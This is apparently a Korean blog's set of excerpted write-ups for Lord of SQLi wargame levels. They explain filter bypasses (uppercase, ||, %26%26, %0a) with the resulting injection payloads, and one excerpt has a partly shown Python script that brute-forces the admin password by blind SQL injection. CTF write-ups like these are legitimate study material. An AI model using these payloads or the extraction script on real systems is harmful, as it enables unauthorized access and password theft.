Bace

문제는 다음과 같다. admin을 필터링하고 있다. id만 admin으로 보내면 되므로 0x61646d696e 로 우회해보았다. 우회되지 않는다. 대문자로도 적어보았더니 풀렸다.

문제는 다음과 같다. orc 문제와 거의 똑같지만 or과 and를 필터링한다. or은 || , and는 %26%26 으로 우회하였다. 일단 orc 때 코딩해놓았던 코드를 재사용해보았다. import requests answer = '' for i in range(1,9): for j in range(33,128): url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27%20||%20%20id=%27admin%27%20%26%26%20ascii(substr(pw,{},1))%20=%20{}%20--%20-".format(i,j) cookies = {'PHPSESSID':'자신의 PHPSESSID'} respons..

문제는 다음과 같다. wolfman 문제와 똑같지만, 이번엔 공백 필터링이 아니라, or과 and를 필터링한다. or 우회하기 위해 || 를 사용했다. ?pw=0%27%20||%20id=%27admin solve

문제는 다음과 같다. GET으로 pw에 거짓인 값을 넣어주고 뒤에 id를 admin으로 바꿔주면 풀리는 문제 같다. 하지만 공백이 필터링 되어있어서 공백 우회를 위해 %20을 썼다. pw뒤에 0을 넣은 후 '를 넣어서 닫아주고 id 부분의 첫번째 자리에 '를 넣어서 요청이 되게 하였다. ?pw=0%27%0aor%0aid=%27admin 이렇게 하면 pw가 거짓인 값이므로 그냥 넘어가게 되고, id가 admin이므로 결과값이 admin이 된다. solve